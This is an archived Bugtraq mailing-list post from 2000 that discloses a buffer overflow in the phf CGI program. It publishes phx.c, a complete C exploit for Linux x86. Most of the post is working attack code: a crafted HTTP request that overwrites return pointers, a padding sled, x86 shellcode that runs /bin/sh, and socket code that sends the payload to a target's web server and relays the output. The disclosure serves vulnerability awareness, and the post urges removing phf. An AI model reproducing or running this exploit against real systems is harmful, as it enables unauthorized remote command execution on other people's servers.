5731610 2000-11-15 13:51 +0100 /208 rader/ proton <proton@ENERGYMECH.NET>
Importerad: 2000-11-15 20:40 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: proton@ENERGYMECH.NET
Mottagare: Bugtraq (import) <13760>
Ärende: Exploit: phf buffer overflow (CGI)
------------------------------------------------------------
From: proton <proton@ENERGYMECH.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3A1286E7.32BC4568@energymech.net>
Funny how a program thats almost a decade old is still around
to haunt us, isnt it?
This should be a potent reminder for all CGI authors out there
that these things can live forever.
This exploit will give remote access on most (all?) Linux-ix86
boxes (and freebsd?) with phf installed, patch or no patch,
its vulnerable.
There is only one remedy, remove it!
If your mailer(s) trash the source below, you can also download
it from http://www.energymech.net/users/proton/phx.c
/proton
//---- phx.c ----
/*
| phx.c -- phf buffer overflow exploit for Linux-ix86
| Copyright (c) 2000 by proton. All rights reserved.
|
| This program is free software; you can redistribute it and/or modify
| it under the terms of the GNU General Public License as published by
| the Free Software Foundation; either version 2 of the License, or
| (at your option) any later version.
|
| This program is distributed in the hope that it will be useful,
| but WITHOUT ANY WARRANTY; without even the implied warranty of
| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
| GNU General Public License for more details.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
char tmp[8192];
char *host;
char *progname;
unsigned char shellcode[] =
"GET
/cgi-bin/phf?&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&"
/*
* 2 pointers, in case of -fomit-frame-pointer
*/
"\x37\xfc\xff\xbf"
"\x37\xfc\xff\xbf"
" HTTP/1.0\n"
/*
* set environment var `HTTP_X'
*/
"X: "
/*
* a bundle of AAA's, they're just as good as NOP's
* but is a tad bit more readable to humans.
* 512 no-op instructions gives us a nice phat
* strike-zone for the above 2 pointers.
*/
"7777777777777777777777777777777777777777777777777777777777777777"
"7777777777777777777777777777777777777777777777777777777777777777"
"7777777777777777777777777777777777777777777777777777777777777777"
"7777777777777777777777777777777777777777777777777777777777777777"
"7777777777777777777777777777777777777777777777777777777777777777"
"7777777777777777777777777777777777777777777777777777777777777777"
"7777777777777777777777777777777777777777777777777777777777777777"
"7777777777777777777777777777777777777777777777777777777777777777"
/*
* exploit code
*/
"\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
"\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
"\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41"
/*
* try to make sense to the webserver
*/
"/bin/sh -c echo 'Content-Type: text/plain';echo '';"
/*
* execute something funny!
*/
"echo Hello! I am running as \\\"`whoami`\\\" on a `arch` cpu;"
"echo Local time is `date` and there are `who|wc -l` users
logged in.;"
"echo '';"
/*
* shellcode will terminate command at the `@'
*/
"@\n\n"
;
void netpipe(int *rsock, int *wsock)
{
struct sockaddr_in sai;
struct hostent *he;
int s;
if (!host || !*host)
{
printf("Usage: %s <host>\n",progname);
exit(1);
}
he = gethostbyname(host);
if (!he)
{
printf("%s: Unknown host\n",host);
exit(1);
}
s = socket(AF_INET,SOCK_STREAM,0); sai.sin_family = AF_INET;
sai.sin_port = htons(80);
memcpy(&sai.sin_addr,he->h_addr_list[0],sizeof(struct
in_addr));
if (connect(s,(struct sockaddr*)&sai,sizeof(sai)) < 0)
{
switch(errno)
{
case ECONNREFUSED:
output("Connection refused.\n");
break;
case ETIMEDOUT:
output("Connection timed out.\n");
break;
case ENETUNREACH:
output("Network unreachable.\n");
break;
default:
output("Unknown error.\n");
break;
}
exit(1);
}
*rsock = *wsock = s;
}
int main(int argc, char **argv)
{
char *q,*cp;
int in,out;
int sz,x,n;
progname = argv[0];
host = argv[1];
netpipe(&in,&out);
write(out,shellcode,sizeof(shellcode));
output("\nCome to papa!\n\n");
n = x = 0;
for(;;)
{
sz = read(in,&tmp[x],512-x);
if (sz < 1)
break;
x += sz;
q = cp = tmp;
for(sz=x;sz;)
{
if (*q == '\n')
{
write(1,cp,(q-cp)+1);
cp = q + 1;
}
q++;
sz--;
}
if (cp != tmp)
{
sz = x - (cp - tmp);
memcpy(tmp,cp,sz);
x -= (cp - tmp);
}
}
exit(0);
}
//---- end of file ----
(5731610) --------------------------------(Ombruten)